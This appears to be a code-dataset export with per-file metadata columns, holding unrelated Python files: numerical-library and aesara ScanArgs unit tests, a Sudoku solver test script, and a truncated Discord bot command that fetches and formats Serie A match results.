h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=numpy.array([[[111.,112.],[121,122.]],[[211.,212.],[221,222.]]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
def testProjector_rank4_fast_reduced_with_reduced_input(self):
x=ContinuousFunction(self.domain).getX()
h=Lsup(self.domain.getSize())
p=Projector(self.domain,reduce=True,fast=True)
td_ref=numpy.array([[[[1111.,1112.],[1121,1122.]],[[1211.,1212.],[1221,1222.]]],
[[[2111.,2112.],[2121,2122.]],[[2211.,2212.],[2221,2222.]]]])
td=p(Data(td_ref,ReducedFunction(self.domain)))
self.assertLess(Lsup(td-td_ref), Lsup(td_ref)*h)
| 54.243506
| 154
| 0.581927
| 7,396
| 66,828
| 5.19132
| 0.06463
| 0.038026
| 0.024378
| 0.021097
| 0.947519
| 0.936398
| 0.932439
| 0.931215
| 0.926527
| 0.922047
| 0
| 0.450763
| 0.286871
| 66,828
| 1,231
| 155
| 54.287571
| 0.35489
| 0.008933
| 0
| 0.868733
| 0
| 0
| 0.019524
| 0
| 0
| 0
| 0
| 0
| 0.090246
| 1
| 0.076572
| false
| 0
| 0.022789
| 0.013674
| 0.132179
| 0.000912
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4fe5eec57880f00e878a2549b7b487f2c57c7922
| 18,665
|
py
|
Python
|
tests/scan/test_utils.py
|
zaxtax/aesara
|
ef256e526e313f9e7916f8c9b2c4802c44d0b44a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/scan/test_utils.py
|
zaxtax/aesara
|
ef256e526e313f9e7916f8c9b2c4802c44d0b44a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/scan/test_utils.py
|
zaxtax/aesara
|
ef256e526e313f9e7916f8c9b2c4802c44d0b44a
|
[
"BSD-3-Clause"
] | null | null | null |
from copy import copy
import numpy as np
import pytest
import aesara
from aesara import tensor as at
from aesara.scan.utils import ScanArgs
@pytest.fixture(scope="module", autouse=True)
def set_aesara_flags():
with aesara.config.change_flags(cxx="", mode="FAST_COMPILE"):
yield
def create_test_hmm():
rng_state = np.random.default_rng(23422)
rng_tt = aesara.shared(rng_state, name="rng", borrow=True)
rng_tt.tag.is_rng = True
rng_tt.default_update = rng_tt
N_tt = at.iscalar("N")
N_tt.tag.test_value = 10
M_tt = at.iscalar("M")
M_tt.tag.test_value = 2
mus_tt = at.matrix("mus")
mus_tt.tag.test_value = np.stack(
[np.arange(0.0, 10), np.arange(0.0, -10, -1)], axis=-1
).astype(aesara.config.floatX)
sigmas_tt = at.ones((N_tt,))
sigmas_tt.name = "sigmas"
pi_0_rv = at.random.dirichlet(at.ones((M_tt,)), rng=rng_tt, name="pi_0")
Gamma_rv = at.random.dirichlet(at.ones((M_tt, M_tt)), rng=rng_tt, name="Gamma")
S_0_rv = at.random.categorical(pi_0_rv, rng=rng_tt, name="S_0")
def scan_fn(mus_t, sigma_t, S_tm1, Gamma_t, rng):
S_t = at.random.categorical(Gamma_t[S_tm1], rng=rng, name="S_t")
Y_t = at.random.normal(mus_t[S_t], sigma_t, rng=rng, name="Y_t")
return S_t, Y_t
(S_rv, Y_rv), scan_updates = aesara.scan(
fn=scan_fn,
sequences=[mus_tt, sigmas_tt],
non_sequences=[Gamma_rv, rng_tt],
outputs_info=[{"initial": S_0_rv, "taps": [-1]}, {}],
strict=True,
name="scan_rv",
)
Y_rv.name = "Y_rv"
scan_op = Y_rv.owner.op
scan_args = ScanArgs.from_node(Y_rv.owner)
Gamma_in = scan_args.inner_in_non_seqs[0]
Y_t = scan_args.inner_out_nit_sot[0]
mus_t = scan_args.inner_in_seqs[0]
sigmas_t = scan_args.inner_in_seqs[1]
S_t = scan_args.inner_out_sit_sot[0]
rng_in = scan_args.inner_out_shared[0]
rng_updates = scan_updates[rng_tt]
rng_updates.name = "rng_updates"
mus_in = Y_rv.owner.inputs[1]
mus_in.name = "mus_in"
sigmas_in = Y_rv.owner.inputs[2]
sigmas_in.name = "sigmas_in"
# The output `S_rv` is really `S_rv[1:]`, so we have to extract the actual
# `Scan` output: `S_rv`.
S_in = S_rv.owner.inputs[0]
S_in.name = "S_in"
return locals()
def test_ScanArgs():
# Make sure we can create an empty `ScanArgs`
scan_args = ScanArgs.create_empty()
assert scan_args.n_steps is None
for name in scan_args.field_names:
if name == "n_steps":
continue
assert len(getattr(scan_args, name)) == 0
with pytest.raises(TypeError):
ScanArgs.from_node(at.ones(2).owner)
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
scan_op = hmm_model_env["scan_op"]
# Make sure we can get alternate variables
test_v = scan_args.outer_out_sit_sot[0]
alt_test_v = scan_args.get_alt_field(test_v, "inner_out")
assert alt_test_v == scan_args.inner_out_sit_sot[0]
alt_test_v = scan_args.get_alt_field(test_v, "outer_in")
assert alt_test_v == scan_args.outer_in_sit_sot[0]
# Check the `__repr__` and `__str__`
scan_args_repr = repr(scan_args)
# Just make sure it doesn't err-out
assert scan_args_repr.startswith("ScanArgs")
# Check the properties that allow us to use
# `Scan.get_oinp_iinp_iout_oout_mappings` as-is to implement
# `ScanArgs.var_mappings`
assert scan_args.n_nit_sot == scan_op.n_nit_sot
assert scan_args.n_mit_mot == scan_op.n_mit_mot
# The `scan_args` base class always clones the inner-graph;
# here we make sure it doesn't (and that all the inputs are the same)
assert scan_args.inputs == scan_op.inputs
assert scan_args.info == scan_op.info
# Check that `ScanArgs.find_among_fields` works
test_v = scan_op.inner_seqs(scan_op.inputs)[1]
field_info = scan_args.find_among_fields(test_v)
assert field_info.name == "inner_in_seqs"
assert field_info.index == 1
assert field_info.inner_index is None
assert scan_args.inner_inputs[field_info.agg_index] == test_v
test_l = scan_op.inner_non_seqs(scan_op.inputs)
# We didn't index this argument, so it's a `list` (i.e. bad input)
field_info = scan_args.find_among_fields(test_l)
assert field_info is None
test_v = test_l[0]
field_info = scan_args.find_among_fields(test_v)
assert field_info.name == "inner_in_non_seqs"
assert field_info.index == 0
assert field_info.inner_index is None
assert scan_args.inner_inputs[field_info.agg_index] == test_v
scan_args_copy = copy(scan_args)
assert scan_args_copy is not scan_args
assert scan_args_copy == scan_args
assert scan_args_copy != test_v
scan_args_copy.outer_in_seqs.pop()
assert scan_args_copy != scan_args
def test_ScanArgs_basics_mit_sot():
rng_state = np.random.RandomState(np.random.MT19937(np.random.SeedSequence(1234)))
rng_tt = aesara.shared(rng_state, name="rng", borrow=True)
rng_tt.tag.is_rng = True
rng_tt.default_update = rng_tt
N_tt = at.iscalar("N")
N_tt.tag.test_value = 10
M_tt = at.iscalar("M")
M_tt.tag.test_value = 2
mus_tt = at.matrix("mus")
mus_tt.tag.test_value = np.stack(
[np.arange(0.0, 10), np.arange(0.0, -10, -1)], axis=-1
).astype(aesara.config.floatX)
sigmas_tt = at.ones((N_tt,))
sigmas_tt.name = "sigmas"
pi_0_rv = at.random.dirichlet(at.ones((M_tt,)), rng=rng_tt, name="pi_0")
Gamma_rv = at.random.dirichlet(at.ones((M_tt, M_tt)), rng=rng_tt, name="Gamma")
S_0_rv = at.random.categorical(pi_0_rv, rng=rng_tt, name="S_0")
def scan_fn(mus_t, sigma_t, S_tm2, S_tm1, Gamma_t, rng):
S_t = at.random.categorical(Gamma_t[S_tm2], rng=rng, name="S_t")
Y_t = at.random.normal(mus_t[S_tm1], sigma_t, rng=rng, name="Y_t")
return S_t, Y_t
(S_rv, Y_rv), scan_updates = aesara.scan(
fn=scan_fn,
sequences=[mus_tt, sigmas_tt],
non_sequences=[Gamma_rv, rng_tt],
outputs_info=[{"initial": at.stack([S_0_rv, S_0_rv]), "taps": [-2, -1]}, {}],
strict=True,
name="scan_rv",
)
# Adding names should make output easier to read
Y_rv.name = "Y_rv"
# This `S_rv` outer-output is actually a `Subtensor` of the "real" output
S_rv = S_rv.owner.inputs[0]
S_rv.name = "S_rv"
rng_updates = scan_updates[rng_tt]
rng_updates.name = "rng_updates"
mus_in = Y_rv.owner.inputs[1]
mus_in.name = "mus_in"
sigmas_in = Y_rv.owner.inputs[2]
sigmas_in.name = "sigmas_in"
scan_args = ScanArgs.from_node(Y_rv.owner)
test_v = scan_args.inner_in_mit_sot[0][1]
field_info = scan_args.find_among_fields(test_v)
assert field_info.name == "inner_in_mit_sot"
assert field_info.index == 0
assert field_info.inner_index == 1
assert field_info.agg_index == 3
rm_info = scan_args._remove_from_fields(at.ones(2))
assert rm_info is None
rm_info = scan_args._remove_from_fields(test_v)
assert rm_info.name == "inner_in_mit_sot"
assert rm_info.index == 0
assert rm_info.inner_index == 1
assert rm_info.agg_index == 3
def test_ScanArgs_remove_inner_input():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
Y_t = hmm_model_env["Y_t"]
Y_rv = hmm_model_env["Y_rv"]
sigmas_in = hmm_model_env["sigmas_in"]
sigmas_t = hmm_model_env["sigmas_t"]
Gamma_rv = hmm_model_env["Gamma_rv"]
Gamma_in = hmm_model_env["Gamma_in"]
hmm_model_env["S_rv"]
S_in = hmm_model_env["S_in"]
S_t = hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Check `ScanArgs.remove_from_fields` by removing `sigmas[t]` (i.e. the
# inner-graph input)
scan_args_copy = copy(scan_args)
test_v = sigmas_t
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=False)
removed_nodes, _ = zip(*rm_info)
assert sigmas_t in removed_nodes
assert sigmas_t not in scan_args_copy.inner_in_seqs
assert Y_t not in removed_nodes
assert len(scan_args_copy.inner_out_nit_sot) == 1
scan_args_copy = copy(scan_args)
test_v = sigmas_t
# This removal includes dependents
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
# `sigmas[t]` (i.e. inner-graph input) should be gone
assert sigmas_t in removed_nodes
assert sigmas_t not in scan_args_copy.inner_in_seqs
# `Y_t` (i.e. inner-graph output) should be gone
assert Y_t in removed_nodes
assert len(scan_args_copy.inner_out_nit_sot) == 0
# `Y_rv` (i.e. outer-graph output) should be gone
assert Y_rv in removed_nodes
assert Y_rv not in scan_args_copy.outer_outputs
assert len(scan_args_copy.outer_out_nit_sot) == 0
# `sigmas_in` (i.e. outer-graph input) should be gone
assert sigmas_in in removed_nodes
assert test_v not in scan_args_copy.inner_in_seqs
# These shouldn't have been removed
assert S_t in scan_args_copy.inner_out_sit_sot
assert S_in in scan_args_copy.outer_out_sit_sot
assert Gamma_in in scan_args_copy.inner_in_non_seqs
assert Gamma_rv in scan_args_copy.outer_in_non_seqs
assert rng_tt in scan_args_copy.outer_in_shared
assert rng_in in scan_args_copy.inner_out_shared
assert rng_updates in scan_args.outer_out_shared
# The other `Y_rv`-related inputs currently aren't removed, even though
# they're no longer needed.
# TODO: Would be nice if we did this, too
# assert len(scan_args_copy.outer_in_seqs) == 0
# TODO: Would be nice if we did this, too
# assert len(scan_args_copy.inner_in_seqs) == 0
# We shouldn't be able to remove the removed node
with pytest.raises(ValueError):
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
def test_ScanArgs_remove_outer_input():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
Y_t = hmm_model_env["Y_t"]
Y_rv = hmm_model_env["Y_rv"]
sigmas_in = hmm_model_env["sigmas_in"]
sigmas_t = hmm_model_env["sigmas_t"]
Gamma_rv = hmm_model_env["Gamma_rv"]
Gamma_in = hmm_model_env["Gamma_in"]
hmm_model_env["S_rv"]
S_in = hmm_model_env["S_in"]
S_t = hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Remove `sigmas` (i.e. the outer-input)
scan_args_copy = copy(scan_args)
test_v = sigmas_in
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
# `sigmas_in` (i.e. outer-graph input) should be gone
assert scan_args.outer_in_seqs[-1] in removed_nodes
assert test_v not in scan_args_copy.inner_in_seqs
# `sigmas[t]` should be gone
assert sigmas_t in removed_nodes
assert sigmas_t not in scan_args_copy.inner_in_seqs
# `Y_t` (i.e. inner-graph output) should be gone
assert Y_t in removed_nodes
assert len(scan_args_copy.inner_out_nit_sot) == 0
# `Y_rv` (i.e. outer-graph output) should be gone
assert Y_rv not in scan_args_copy.outer_outputs
assert len(scan_args_copy.outer_out_nit_sot) == 0
assert S_t in scan_args_copy.inner_out_sit_sot
assert S_in in scan_args_copy.outer_out_sit_sot
assert Gamma_in in scan_args_copy.inner_in_non_seqs
assert Gamma_rv in scan_args_copy.outer_in_non_seqs
assert rng_tt in scan_args_copy.outer_in_shared
assert rng_in in scan_args_copy.inner_out_shared
assert rng_updates in scan_args.outer_out_shared
def test_ScanArgs_remove_inner_output():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
Y_t = hmm_model_env["Y_t"]
Y_rv = hmm_model_env["Y_rv"]
hmm_model_env["sigmas_in"]
hmm_model_env["sigmas_t"]
Gamma_rv = hmm_model_env["Gamma_rv"]
Gamma_in = hmm_model_env["Gamma_in"]
hmm_model_env["S_rv"]
S_in = hmm_model_env["S_in"]
S_t = hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Remove `Y_t` (i.e. the inner-output)
scan_args_copy = copy(scan_args)
test_v = Y_t
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
# `Y_t` (i.e. inner-graph output) should be gone
assert Y_t in removed_nodes
assert len(scan_args_copy.inner_out_nit_sot) == 0
# `Y_rv` (i.e. outer-graph output) should be gone
assert Y_rv not in scan_args_copy.outer_outputs
assert len(scan_args_copy.outer_out_nit_sot) == 0
assert S_t in scan_args_copy.inner_out_sit_sot
assert S_in in scan_args_copy.outer_out_sit_sot
assert Gamma_in in scan_args_copy.inner_in_non_seqs
assert Gamma_rv in scan_args_copy.outer_in_non_seqs
assert rng_tt in scan_args_copy.outer_in_shared
assert rng_in in scan_args_copy.inner_out_shared
assert rng_updates in scan_args.outer_out_shared
def test_ScanArgs_remove_outer_output():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
Y_t = hmm_model_env["Y_t"]
Y_rv = hmm_model_env["Y_rv"]
hmm_model_env["sigmas_in"]
hmm_model_env["sigmas_t"]
Gamma_rv = hmm_model_env["Gamma_rv"]
Gamma_in = hmm_model_env["Gamma_in"]
S_in = hmm_model_env["S_in"]
S_t = hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Remove `Y_rv` (i.e. a nit-sot outer-output)
scan_args_copy = copy(scan_args)
test_v = Y_rv
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
# `Y_t` (i.e. inner-graph output) should be gone
assert Y_t in removed_nodes
assert len(scan_args_copy.inner_out_nit_sot) == 0
# `Y_rv` (i.e. outer-graph output) should be gone
assert Y_rv not in scan_args_copy.outer_outputs
assert len(scan_args_copy.outer_out_nit_sot) == 0
assert S_t in scan_args_copy.inner_out_sit_sot
assert S_in in scan_args_copy.outer_out_sit_sot
assert Gamma_in in scan_args_copy.inner_in_non_seqs
assert Gamma_rv in scan_args_copy.outer_in_non_seqs
assert rng_tt in scan_args_copy.outer_in_shared
assert rng_in in scan_args_copy.inner_out_shared
assert rng_updates in scan_args.outer_out_shared
def test_ScanArgs_remove_nonseq_outer_input():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
Y_t = hmm_model_env["Y_t"]
Y_rv = hmm_model_env["Y_rv"]
mus_in = hmm_model_env["mus_in"]
mus_t = hmm_model_env["mus_t"]
sigmas_in = hmm_model_env["sigmas_in"]
sigmas_t = hmm_model_env["sigmas_t"]
Gamma_rv = hmm_model_env["Gamma_rv"]
Gamma_in = hmm_model_env["Gamma_in"]
S_in = hmm_model_env["S_in"]
S_t = hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Remove `Gamma` (i.e. a non-sequence outer-input)
scan_args_copy = copy(scan_args)
test_v = Gamma_rv
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
assert Gamma_rv in removed_nodes
assert Gamma_in in removed_nodes
assert S_in in removed_nodes
assert S_t in removed_nodes
assert Y_t in removed_nodes
assert Y_rv in removed_nodes
assert mus_in in scan_args_copy.outer_in_seqs
assert sigmas_in in scan_args_copy.outer_in_seqs
assert mus_t in scan_args_copy.inner_in_seqs
assert sigmas_t in scan_args_copy.inner_in_seqs
assert rng_tt in scan_args_copy.outer_in_shared
assert rng_in in scan_args_copy.inner_out_shared
assert rng_updates in scan_args.outer_out_shared
def test_ScanArgs_remove_nonseq_inner_input():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
hmm_model_env["Y_t"]
hmm_model_env["Y_rv"]
mus_in = hmm_model_env["mus_in"]
mus_t = hmm_model_env["mus_t"]
sigmas_in = hmm_model_env["sigmas_in"]
sigmas_t = hmm_model_env["sigmas_t"]
Gamma_rv = hmm_model_env["Gamma_rv"]
Gamma_in = hmm_model_env["Gamma_in"]
S_in = hmm_model_env["S_in"]
S_t = hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Remove `Gamma` (i.e. a non-sequence inner-input)
scan_args_copy = copy(scan_args)
test_v = Gamma_in
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
assert Gamma_in in removed_nodes
assert Gamma_rv in removed_nodes
assert S_in in removed_nodes
assert S_t in removed_nodes
assert mus_in in scan_args_copy.outer_in_seqs
assert sigmas_in in scan_args_copy.outer_in_seqs
assert mus_t in scan_args_copy.inner_in_seqs
assert sigmas_t in scan_args_copy.inner_in_seqs
assert rng_tt in scan_args_copy.outer_in_shared
assert rng_in in scan_args_copy.inner_out_shared
assert rng_updates in scan_args.outer_out_shared
def test_ScanArgs_remove_shared_inner_output():
hmm_model_env = create_test_hmm()
scan_args = hmm_model_env["scan_args"]
hmm_model_env["scan_op"]
hmm_model_env["Y_t"]
Y_rv = hmm_model_env["Y_rv"]
mus_in = hmm_model_env["mus_in"]
mus_t = hmm_model_env["mus_t"]
sigmas_in = hmm_model_env["sigmas_in"]
sigmas_t = hmm_model_env["sigmas_t"]
hmm_model_env["Gamma_rv"]
hmm_model_env["Gamma_in"]
S_in = hmm_model_env["S_in"]
hmm_model_env["S_t"]
rng_tt = hmm_model_env["rng_tt"]
rng_in = hmm_model_env["rng_in"]
rng_updates = hmm_model_env["rng_updates"]
# Remove `rng` (i.e. a shared inner-output)
scan_args_copy = copy(scan_args)
test_v = rng_updates
rm_info = scan_args_copy.remove_from_fields(test_v, rm_dependents=True)
removed_nodes, _ = zip(*rm_info)
assert rng_tt in removed_nodes
assert rng_in in removed_nodes
assert rng_updates in removed_nodes
assert Y_rv in removed_nodes
assert S_in in removed_nodes
assert sigmas_in in scan_args_copy.outer_in_seqs
assert sigmas_t in scan_args_copy.inner_in_seqs
assert mus_in in scan_args_copy.outer_in_seqs
assert mus_t in scan_args_copy.inner_in_seqs
| 34.693309
| 86
| 0.713957
| 3,298
| 18,665
| 3.61977
| 0.069739
| 0.10186
| 0.101357
| 0.057464
| 0.83297
| 0.803401
| 0.779695
| 0.756492
| 0.747613
| 0.747613
| 0
| 0.006933
| 0.188588
| 18,665
| 537
| 87
| 34.757914
| 0.781314
| 0.108492
| 0
| 0.727735
| 0
| 0
| 0.056824
| 0
| 0
| 0
| 0
| 0.001862
| 0.307888
| 1
| 0.033079
| false
| 0
| 0.015267
| 0
| 0.05598
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ff27f69b89670b2baefce25a36fcbf63e0d1175
| 1,408
|
py
|
Python
|
tests.py
|
AmandaGouveia/SudokuSolver
|
e748d8d50c8515c28682485f6c485353fdbf4863
|
[
"MIT"
] | null | null | null |
tests.py
|
AmandaGouveia/SudokuSolver
|
e748d8d50c8515c28682485f6c485353fdbf4863
|
[
"MIT"
] | null | null | null |
tests.py
|
AmandaGouveia/SudokuSolver
|
e748d8d50c8515c28682485f6c485353fdbf4863
|
[
"MIT"
] | null | null | null |
import app
puzzle = [
[5, 3, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 8, 0, 0],
[0, 2, 7, 1, 3, 0, 0, 0, 0],
[0, 9, 0, 3, 2, 8, 0, 5, 0],
[0, 1, 0, 4, 0, 0, 0, 0, 6],
[0, 0, 0, 0, 0, 0, 0, 0, 4],
[0, 6, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 5, 0, 0, 4, 0, 6, 0],
[3, 0, 0, 0, 0, 0, 9, 0, 0]
]
correct = [
[
[5, 3, 1, 8, 4, 9, 6, 7, 2],
[6, 4, 9, 5, 7, 2, 8, 3, 1],
[8, 2, 7, 1, 3, 6, 5, 4, 9],
[4, 9, 6, 3, 2, 8, 1, 5, 7],
[2, 1, 8, 4, 5, 7, 3, 9, 6],
[7, 5, 3, 9, 6, 1, 2, 8, 4],
[9, 6, 2, 7, 8, 3, 4, 1, 5],
[1, 8, 5, 2, 9, 4, 7, 6, 3],
[3, 7, 4, 6, 1, 5, 9, 2, 8]
]
]
incorrect = [
[
[5, 3, 1, 8, 4, 9, 6, 7, 2],
[6, 4, 9, 5, 7, 2, 8, 3, 1],
[8, 2, 7, 1, 3, 6, 5, 4, 9],
[4, 9, 6, 3, 2, 8, 1, 5, 7],
[2, 1, 8, 4, 5, 7, 3, 9, 6],
[7, 5, 3, 9, 6, 1, 2, 8, 4],
[9, 6, 2, 7, 8, 3, 4, 1, 5],
[1, 8, 5, 2, 9, 4, 7, 6, 3],
[8, 7, 4, 6, 1, 5, 9, 2, 8]
],
[
[5, 3, 1, 8, 4, 9, 6, 7, 2],
[6, 4, 9, 5, 7, 2, 8, 3, 1],
[8, 2, 7, 1, 3, 6, 5, 4, 9],
[4, 9, 6, 3, 2, 8, 1, 5, 7],
[2, 1, 8, 4, 5, 7, 3, 9, 6],
[7, 5, 3, 9, 6, 1, 2, 8, 4],
[9, 6, 2, 7, 8, 3, 4, 1, 5],
[1, 8, 5, 2, 9, 4, 7, 6, 3],
[0, 7, 4, 6, 1, 5, 9, 2, 8]
]
]
print(app.solve(puzzle))
| 25.6
| 36
| 0.265625
| 333
| 1,408
| 1.123123
| 0.051051
| 0.224599
| 0.256684
| 0.26738
| 0.791444
| 0.791444
| 0.772727
| 0.772727
| 0.665775
| 0.663102
| 0
| 0.41169
| 0.441051
| 1,408
| 54
| 37
| 26.074074
| 0.063532
| 0
| 0
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.02
| 0
| 0.02
| 0.02
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8c92cadb4ac1c3337d2b67401a9eac17bc429021
| 9,305
|
py
|
Python
|
commands/results/matches.py
|
PyGera/fantacalcio-bot
|
bf9f8aba45d8c21b22255267764077d443e3ee10
|
[
"MIT"
] | 2
|
2021-10-08T23:14:23.000Z
|
2021-11-01T15:34:21.000Z
|
commands/results/matches.py
|
PyGera/fantacalcio-bot
|
bf9f8aba45d8c21b22255267764077d443e3ee10
|
[
"MIT"
] | 1
|
2021-10-17T00:16:06.000Z
|
2021-10-17T00:16:06.000Z
|
commands/results/matches.py
|
PyGera/fantacalcio-bot
|
bf9f8aba45d8c21b22255267764077d443e3ee10
|
[
"MIT"
] | null | null | null |
import discord
import datetime
import requests
async def matches_function(ctx, client, FOOTBALL_API_HEADERS):
'''
Matches command:
Getting live data about the current Serie A TIM matchday
'''
my_round = {}
params = (
("season_id","2100"),
)
# Requesting to the API all the data about the matches
matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
matches = []
# Getting the current matchday
for match in matches_req['data']:
if match['round']['is_current']:
my_round = {'name': match['round']['name'], 'id': match['round']['round_id']}
matches.append(match)
# Sorting the matches by time
matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
# Message formatting
embedVar = discord.Embed(
title=f'{my_round["name"]}a Giornata di Serie A TIM',
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for match in matches:
embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
# Send everything
message = await ctx.reply(embed=embedVar, mention_author=False)
emojis = ["⬅️", "➡️","🔄"]
# React to create the matches menu
for emoji in emojis:
await message.add_reaction(emoji)
async def match_back(message, client, FOOTBALL_API_HEADERS):
my_round = {}
params = (
("season_id","2100"),
)
matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
matches = []
for match in matches_req['data']:
if match['round']['is_current']:
my_round = {'name': str(int(match['round']['name'])-1), 'id': match['round']['round_id']}
for match in matches_req['data']:
if match['round']['name'] == my_round['name']:
matches.append(match)
matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
embedVar = discord.Embed(
title=f'{my_round["name"]}a Giornata di Serie A TIM',
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for match in matches:
embedVar.add_field(name=f"{(datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S') + datetime.timedelta(hours=2)).strftime('%H:%M %d/%m/%Y') if match['status_code'] == 0 else f''':red_circle: LIVE {match['minute']}' ''' if match['status_code'] == 1 else ':clock10: Primo Tempo' if match['status_code'] == 11 else 'Partita Terminata'}", value=f"{str(discord.utils.get(client.emojis, name=match['home_team']['short_code']))} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['home_team']['name']} {f'''{match['stats']['home_score']} {'**'if match['stats']['home_score'] > match['stats']['away_score'] and match['status_code'] == 3 else ' '} - {'**'if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '}{match['stats']['away_score']}''' if match['status_code'] != 0 else ' - '} {match['away_team']['name']}{'**' if match['stats']['home_score'] < match['stats']['away_score'] and match['status_code'] == 3 else ' '} {str(discord.utils.get(client.emojis, name=match['away_team']['short_code']))}", inline=False)
await message.edit(embed=embedVar, mention_author=False)
emojis = ["🕙"]
for emoji in emojis:
await message.add_reaction(emoji)
async def match_forward(message, client, FOOTBALL_API_HEADERS):
my_round = {}
params = (
("season_id","2100"),
)
matches_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/matches', headers=FOOTBALL_API_HEADERS, params=params).json()
matches = []
for match in matches_req['data']:
if match['round']['is_current']:
my_round = {'name': str(int(match['round']['name'])+1), 'id': match['round']['round_id']}
for match in matches_req['data']:
if match['round']['name'] == my_round['name']:
matches.append(match)
matches.sort(key=lambda match: datetime.datetime.strptime(match['match_start'], '%Y-%m-%d %H:%M:%S'))
embedVar = discord.Embed(
title=f'{my_round["name"]}a Giornata di Serie A TIM',
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for match in matches:
